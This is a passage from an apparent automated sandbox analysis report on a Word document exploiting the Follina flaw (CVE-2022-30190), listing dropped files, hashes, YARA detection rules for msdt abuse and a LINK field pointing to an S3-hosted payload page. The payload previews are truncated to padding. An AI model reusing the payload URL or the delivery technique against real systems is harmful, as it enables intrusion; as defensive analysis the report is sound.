                                                                                                                                                                  Preview:<?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2022-08-18T00:01:48">.. Build: 16.0.15614.30525-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\3903F105.htm

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                  File Type:HTML document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):6837
                                                                                                                                                                  Entropy (8bit):0.861791117899086
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12:qTWvzSExH8d2GZf1NGwtMQwue4Sv8VM1Gb:0WradlR1N7GD34S0VMG
                                                                                                                                                                  MD5:BFBFA8FDDA62476690C9077946372EAA
                                                                                                                                                                  SHA1:BBD80340C07F716600B54242F11F25E1BDC442F2
                                                                                                                                                                  SHA-256:A353DB4CFD64F1876F3F99BE6481189DBF5E770D71B8D03CBA84FF551EDBCDC6
                                                                                                                                                                  SHA-512:7B234021E52E4CA1B14F93F12CC23DD61B135DCC57512672BF97DC1CC2D964072DB2F82E91CBDFCA41177D3B707E98F1C895C094D0D237A3505BB2606B8FD5CC
                                                                                                                                                                  Malicious:true
                                                                                                                                                                  Yara Hits:
                                                                                                                                                                  • Rule: SUSP_PS1_Msdt_Execution_May22, Description: Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\3903F105.htm, Author: Nasreddine Bencherchali, Christian Burkard
                                                                                                                                                                  • Rule: EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22, Description: Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\3903F105.htm, Author: Tobias Michalski, Christian Burkard
                                                                                                                                                                  • Rule: JoeSecurity_Follina, Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\3903F105.htm, Author: Joe Security
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                                                  Preview:<!doctype html>..<html lang="en">..<body>..<script>..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAA

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\3A694E5B.htm

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                  File Type:HTML document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):6837
                                                                                                                                                                  Entropy (8bit):0.861791117899086
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12:qTWvzSExH8d2GZf1NGwtMQwue4Sv8VM1Gb:0WradlR1N7GD34S0VMG
                                                                                                                                                                  MD5:BFBFA8FDDA62476690C9077946372EAA
                                                                                                                                                                  SHA1:BBD80340C07F716600B54242F11F25E1BDC442F2
                                                                                                                                                                  SHA-256:A353DB4CFD64F1876F3F99BE6481189DBF5E770D71B8D03CBA84FF551EDBCDC6
                                                                                                                                                                  SHA-512:7B234021E52E4CA1B14F93F12CC23DD61B135DCC57512672BF97DC1CC2D964072DB2F82E91CBDFCA41177D3B707E98F1C895C094D0D237A3505BB2606B8FD5CC
                                                                                                                                                                  Malicious:true
                                                                                                                                                                  Yara Hits:
                                                                                                                                                                  • Rule: SUSP_PS1_Msdt_Execution_May22, Description: Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\3A694E5B.htm, Author: Nasreddine Bencherchali, Christian Burkard
                                                                                                                                                                  • Rule: EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22, Description: Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\3A694E5B.htm, Author: Tobias Michalski, Christian Burkard
                                                                                                                                                                  • Rule: JoeSecurity_Follina, Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\3A694E5B.htm, Author: Joe Security
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                                                  Preview:<!doctype html>..<html lang="en">..<body>..<script>..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAA

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRS{1EB9DA41-0F80-48E3-B000-307AD8C63D0C}.tmp

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):1536
                                                                                                                                                                  Entropy (8bit):1.0893697448949966
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:6:olgI5lNcYeupcIupMzId5XwPB8EURyajJ2QN/wPxZSu7mN:4veIcIUMcd5AB8uWJ2LZS1
                                                                                                                                                                  MD5:AAA6D6B978FBAFCD5DD76FAC163C7DE5
                                                                                                                                                                  SHA1:82815A1CE8117B7B3EF81BB8E098CFA21DC0A62C
                                                                                                                                                                  SHA-256:7BC2DB1BBCF5FE247881220B96C3F0901535FAE1D23499ADE5F1BC477E676657
                                                                                                                                                                  SHA-512:8131699881585D82A05E86BEEB725C94D31224E8FE01415B6961172013DEE1CD440D18D1FFDB3C4AE11017D2DE6113E9DB875D73F706551CBA84057137EC9A11
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:..L.I.N.K. .h.t.m.l.f.i.l.e. .".h.t.t.p.s.:././.s.q.d.o.c.s...s.3...e.u.-.w.e.s.t.-.2...a.m.a.z.o.n.a.w.s...c.o.m./.f.b.0.f.9.c.4.5.-.f.b.5.f.-.4.6.9.0.-.9.8.1.5.-.e.1.1.a.7.6.2.d.4.7.3.9...h.t.m.l.!.". .".". .\.p. .\.f. .0..... . .......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................j....U....

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRS{525FBF1A-C1F9-4518-BDBC-B56F8A029AE3}.tmp

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):1024
                                                                                                                                                                  Entropy (8bit):0.05390218305374581
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:ol3lYdn:4Wn
                                                                                                                                                                  MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                                                                                                                                                  SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                                                                                                                                                  SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                                                                                                                                                  SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\fb0f9c45-fb5f-4690-9815-e11a762d4739[1].htm

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                  File Type:HTML document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                  Category:downloaded
                                                                                                                                                                  Size (bytes):6837
                                                                                                                                                                  Entropy (8bit):0.861791117899086
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12:qTWvzSExH8d2GZf1NGwtMQwue4Sv8VM1Gb:0WradlR1N7GD34S0VMG
                                                                                                                                                                  MD5:BFBFA8FDDA62476690C9077946372EAA
                                                                                                                                                                  SHA1:BBD80340C07F716600B54242F11F25E1BDC442F2
                                                                                                                                                                  SHA-256:A353DB4CFD64F1876F3F99BE6481189DBF5E770D71B8D03CBA84FF551EDBCDC6
                                                                                                                                                                  SHA-512:7B234021E52E4CA1B14F93F12CC23DD61B135DCC57512672BF97DC1CC2D964072DB2F82E91CBDFCA41177D3B707E98F1C895C094D0D237A3505BB2606B8FD5CC
                                                                                                                                                                  Malicious:true
                                                                                                                                                                  Yara Hits:
                                                                                                                                                                  • Rule: SUSP_PS1_Msdt_Execution_May22, Description: Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\fb0f9c45-fb5f-4690-9815-e11a762d4739[1].htm, Author: Nasreddine Bencherchali, Christian Burkard
                                                                                                                                                                  • Rule: EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22, Description: Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\fb0f9c45-fb5f-4690-9815-e11a762d4739[1].htm, Author: Tobias Michalski, Christian Burkard
                                                                                                                                                                  • Rule: JoeSecurity_Follina, Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\fb0f9c45-fb5f-4690-9815-e11a762d4739[1].htm, Author: Joe Security
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                                                  IE Cache URL:https://sqdocs.s3.eu-west-2.amazonaws.com/fb0f9c45-fb5f-4690-9815-e11a762d4739.html
                                                                                                                                                                  Preview:<!doctype html>..<html lang="en">..<body>..<script>..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAA

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\5pliokiz\5pliokiz.dll

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):5120
                                                                                                                                                                  Entropy (8bit):3.777355438838994
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:48:6NoPhmKraYZkH8KTibUyPBkwjj0JAC+CFSlwY7c1ul8qa33Rq:bDaAkHHoXk83CuzqqK3
                                                                                                                                                                  MD5:D46EE30C023E865494DAF4F8DAA23AC9
                                                                                                                                                                  SHA1:32C5D39F6F5502DACB4A050F53AA78BDC3C08270
                                                                                                                                                                  SHA-256:1ACD209BF71CE0E08717D03F5111D9963FDA116C442D7B27A069E33064068961
                                                                                                                                                                  SHA-512:8DBBE05E07291D255E1E816ABDC029148C2340B3BFC15B874383FB2852FCFA1854D06EAC03725B0F4E610F6BB914A45C5E508CDE467FC16F99D9BF8723047577
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...I..b...........!................>*... ...@....... ....................................@..................................)..S....@.......................`....................................................... ............... ..H............text...D.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................ *......H....... ".............................................................."..(....*J.#(....r...p(....*..(....*2~.....(....*....0.......... ....s..... ....s...............r;..p.........(......s.............5.....".....5.....3+E...../...(.-...2.3+1...:3...+)....3...+....+...+...+...+...,...+...+......r;..p...o................ ...o.........+Y.......r=..p..o......1.r=..p..o..........+(r...p..o...........(........r...p(.........X.......i2..........(.........o........o....-.r...p....

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\5pliokiz\CSCEC77468AE1504898A4CAD2F9B69D7F46.TMP

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                                                  File Type:MSVC .res
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):652
                                                                                                                                                                  Entropy (8bit):3.092552067793945
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryakQbqak7Ynqq3kQbbPN5Dlq5J:+RI+ycuZhN8qakS3bPNnqX
                                                                                                                                                                  MD5:E6B9565D0F832B29757956C93CA42E67
                                                                                                                                                                  SHA1:AD07907F2CC82DF452B99ACFE613552648049F71
                                                                                                                                                                  SHA-256:F0A5AA628E4DA7A3F471077F5C2698512214056CD99DF12D5B4F228E08742833
                                                                                                                                                                  SHA-512:96DD7C71C4400686A4CCA018AFB2E27463F19184FB1B21F8CA6DEF07B2858D8733FD8842813DDB4CFB8B498C9E216A8A494053CC03D4FFF94F1408B362E994BE
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...5.p.l.i.o.k.i.z...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...5.p.l.i.o.k.i.z...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\RES329A.tmp

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                                                                                                                  File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x4ae, 9 symbols
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):1364
                                                                                                                                                                  Entropy (8bit):4.095885984642426
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:24:HGC9A+gY8hHChKLc8fII+ycuZhN8qakS3bPNnq9Wd:kf94Kg8g1ul8qa33Rq9m
                                                                                                                                                                  MD5:E0606348DE8B6B789E1FCDA7F979818A
                                                                                                                                                                  SHA1:9616B07A5460BF7B47F86FF0C9F743E53A87EC84
                                                                                                                                                                  SHA-256:89E111C760BE35C2CA359099ED972FA799AB2183EE65F267313028D753A3EFC3
                                                                                                                                                                  SHA-512:921BAA4EAFA4A5C234B7870D5FA5F01F0A3542DDBE7A7ACED366B7E3F8314F7BA408B43EDE86A84994BAC545DC70B223F1543CBFDDE0735EFB595BCA80E18D40
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:L...J..b.............debug$S........p...................@..B.rsrc$01........X.......T...........@..@.rsrc$02........P...^...............@..@........T....c:\Users\user\AppData\Local\Temp\5pliokiz\CSCEC77468AE1504898A4CAD2F9B69D7F46.TMP................V]..+)uyV.<..g..........4.......C:\Users\user\AppData\Local\Temp\RES329A.tmp.-.<...................'...Microsoft (R) CVTRES...=..cwd.C:\Windows\TEMP\SDIAG_d9af2b63-3a79-4ece-a7db-529be45f68a7.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe...............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...5.p.l.i.o.k.i.z...d.l.l.....(.....L.e.g.a.l.C.o.p.

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\RES48B3.tmp

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                                                                                                                  File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x4ae, 9 symbols
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):1364
                                                                                                                                                                  Entropy (8bit):4.092082924283492
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:24:HkC9A+gbwVhHChKLc8fII+ycuZhNOYakSBNPNnq9Wd:+fbwn4Kg8g1ulta3xq9m
                                                                                                                                                                  MD5:1C12FF4BD83D206E412ACC009814B18F
                                                                                                                                                                  SHA1:6A67AF7484159A1FEBAC932129318B70BCEB9FCE
                                                                                                                                                                  SHA-256:8BFCF5D133EC61257116524AC95D2FCC2AB27134DE166633BC1DCA132CA25A79
                                                                                                                                                                  SHA-512:5E29B0B498CAE374C41EF492C5CBE03119645B97A2E80902016A40D56D80BDC7A92CD2002AC3A92932999E5BE0072B34E95E486C8E97E99A9BBE3CB86D021695
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:L...P..b.............debug$S........p...................@..B.rsrc$01........X.......T...........@..@.rsrc$02........P...^...............@..@........T....c:\Users\user\AppData\Local\Temp\h34ip5a5\CSC3AC1B580675E4658855F5C63BDA7A47F.TMP..................Mk7...9..d............4.......C:\Users\user\AppData\Local\Temp\RES48B3.tmp.-.<...................'...Microsoft (R) CVTRES...=..cwd.C:\Windows\TEMP\SDIAG_d9af2b63-3a79-4ece-a7db-529be45f68a7.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe...............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...h.3.4.i.p.5.a.5...d.l.l.....(.....L.e.g.a.l.C.o.p.

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\RESEEE6.tmp

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                                                                                                                  File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x4ae, 9 symbols
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):1364
                                                                                                                                                                  Entropy (8bit):4.104220642349449
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:24:HVC9A+g44hHlWhhKLc8fII+ycuZhNRakSvPNnq9Wd:RfjYvKg8g1ulRa3tq9m
                                                                                                                                                                  MD5:72FF1A1F1761FA361D8664E02F3ED201
                                                                                                                                                                  SHA1:95AB70F399A8803EDBF4F6FDEB9D3FB63644321D
                                                                                                                                                                  SHA-256:7526A766B4768FBD65FC4D397533F00189414DB7428C8EA5EAC81C58A2A31799
                                                                                                                                                                  SHA-512:A1930463D6DF9592B3382B178F6A244846681D7228384621C9E16FAFC6D8869C192EBB0E76E9AFB4FA4E1C846406EA7696B7E818EE913EA0EA9F6C24CD5073D8
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:L...{..b.............debug$S........p...................@..B.rsrc$01........X.......T...........@..@.rsrc$02........P...^...............@..@........T....c:\Users\user\AppData\Local\Temp\v2wr4cux\CSCB2D03E94AB5B4EC2978640D7F4BF95DE.TMP...............>k....K......3k...........4.......C:\Users\user\AppData\Local\Temp\RESEEE6.tmp.-.<...................'...Microsoft (R) CVTRES...=..cwd.C:\Windows\TEMP\SDIAG_d9af2b63-3a79-4ece-a7db-529be45f68a7.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe...............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...v.2.w.r.4.c.u.x...d.l.l.....(.....L.e.g.a.l.C.o.p.

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\h34ip5a5\CSC3AC1B580675E4658855F5C63BDA7A47F.TMP

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                                                  File Type:MSVC .res
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):652
                                                                                                                                                                  Entropy (8bit):3.1026997471100266
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryAYak7YnqqBNPN5Dlq5J:+RI+ycuZhNOYakSBNPNnqX
                                                                                                                                                                  MD5:A9FCF64D6B37C70DE139F1DBB1640986
                                                                                                                                                                  SHA1:324DC64813DF266D97F72DCBD54A682CF7F7446A
                                                                                                                                                                  SHA-256:2120AE0A67541E384BDA30925EC3756B35F664B395071F77371F803485041293
                                                                                                                                                                  SHA-512:188F2F613A6BEA0E8FCF08C4C6F525478774DF7840D4125C26AFB235FFA7AEB2975993B25DFC52124CF7F775FB2D3E06C1D4FED530402D5046D9C3AEC6DA9069
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...h.3.4.i.p.5.a.5...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...h.3.4.i.p.5.a.5...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\h34ip5a5\h34ip5a5.dll

                                                                                                                                                                  Download File
